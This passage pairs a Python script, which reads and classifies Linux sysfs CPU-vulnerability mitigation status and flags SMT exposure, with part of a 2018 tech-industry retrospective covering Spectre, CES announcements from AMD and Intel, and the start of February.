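    "spectre_v1": "Mitigation: usercopy/swapgs barriers and __user pointer sanitization\n",
    "spectre_v2": "Mitigation: Retpolines, IBPB: conditional, IBRS_FW, STIBP: conditional, RSB filling\n",
    "spec_store_bypass": "Not affected\n",
    "l1tf": "Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable\n",
    "mds": "Vulnerable: Clear CPU buffers attempted, no microcode; SMT vulnerable\n",
}


def classify(raw):
    """Map a sysfs status string to one of: not_affected, mitigated, vulnerable, unknown."""
    text = raw.strip()
    if text == "Not affected":
        return "not_affected"
    if text.startswith("Mitigation:"):
        return "mitigated"
    if text.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def detail(raw):
    """Return the human-readable part after the status prefix, or '' if there is none."""
    text = raw.strip()
    for prefix in ("Mitigation:", "Vulnerable:"):
        if text.startswith(prefix):
            return text[len(prefix):].strip()
    return ""


def smt_caveat(raw):
    """True when the kernel notes that the sibling thread (SMT) remains exposed.

    This marker appears on 'Mitigation:' lines too, so a mitigated status alone
    is not enough to call the issue closed on a hyperthreaded host.
    """
    return "SMT vulnerable" in raw


def summarize(entries):
    """{issue: raw_status} -> {issue: (status, detail, smt_vulnerable)}."""
    return {name: (classify(raw), detail(raw), smt_caveat(raw)) for name, raw in entries.items()}


def needs_attention(entries):
    """Issues still vulnerable, unrecognised, or mitigated but with SMT exposed, sorted by name."""
    flagged = []
    for name, (status, _, smt) in summarize(entries).items():
        if status in ("vulnerable", "unknown") or smt:
            flagged.append(name)
    return sorted(flagged)


def read_sysfs(directory=SYSFS_DIR):
    """Read the live sysfs directory; returns None if this kernel does not expose it."""
    if not directory.is_dir():
        return None
    return {p.name: p.read_text() for p in sorted(directory.iterdir()) if p.is_file()}


if __name__ == "__main__":
    live = read_sysfs()
    data = live if live is not None else SAMPLE_SYSFS
    print("source:", "live sysfs" if live is not None else "constructed sample")
    for name, (status, info, smt) in summarize(data).items():
        flag = " [SMT vulnerable]" if smt else ""
        print(f"{name:18} {status:13} {info}{flag}")
    print("needs attention:", ", ".join(needs_attention(data)) or "none")
```

Run it on a patched host and the interesting output is the "needs attention" line, not the count of "Mitigation:" entries: in the constructed sample, l1tf reports a mitigation yet is still flagged because the kernel says the SMT sibling remains exposed, which is exactly the kind of regression-versus-coverage trade-off the paragraph above describes.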

Not to be outdone by the security news, the CES trade show was one of our busiest ever. AMD kicked off proceedings with a full day of discussions, keynotes, and disclosures. The key to AMD's presentation was that the new Zen microarchitecture products, Ryzen and EPYC, were paving the way for the future. AMD presented roadmaps for product launches in 2018, including new APUs, a new range of desktop processors on 12nm with Zen+ updates, second generation Threadripper at the high end, and a push towards 7nm Vega GPUs at the end of the year. This was a very well put together presentation from AMD, showing that they have roadmaps and are willing to commit to them. On top of this, AMD reiterated its long term roadmap on CPU and GPU technologies through 2020.

One key highlight here was our interview with AMD’s CEO, Dr. Lisa Su , on how AMD is set to approach its new era.

Intel had its usual keynote at CES, hosted by now former CEO Brian Krzanich, which addressed the security issues briefly and spoke mostly about drones and connecting people, but made no mention of the company's progress on its next generation 10nm process technology. Instead, the company mentioned 10nm very briefly at the end of a small 9 minute presentation at the Intel booth the next morning, at 8am, through Gregory Bryant, SVP of the Client Computing Group. The news wasn't great: Intel confirmed it had shipped 10nm for revenue in 2017. It was literally that short of a sentence, with no word on how the technology was progressing or any future timelines.

There was some upside for Intel in January, however. The company launched its best performing integrated graphics solution ever: the Core with Radeon RX Vega Graphics set of SoCs. These processors took quad-core mobile chips and paired them with a custom Polaris-based graphics solution from AMD, all on the same processor package. The graphics chip was connected through Intel's EMIB technology to a stack of HBM2 memory, keeping the package small. The offerings ranged from 65W to 100W TDP, and the goal was to provide something just below discrete graphics solutions in a thin and light form factor. We saw the HP Spectre x360 and Dell XPS 15 both updated with these options, as well as a Hades Canyon NUC, a Chuwi HiGame mini-PC, and a Dell Precision device later in the year.

February: Visiting GlobalFoundries

The transition from January to February is usually a slow time in the industry as Chinese New Year sets in. Depending on the company, this can be anything from a one week break to a three week break, so we don't tend to see many product launches at the end of January or the beginning of February unless the factories have enough stock, or the supply chain doesn't involve China.

Intel kicked off the month with a reactive measure to the Spectre and Meltdown issues, formally announcing the creation of the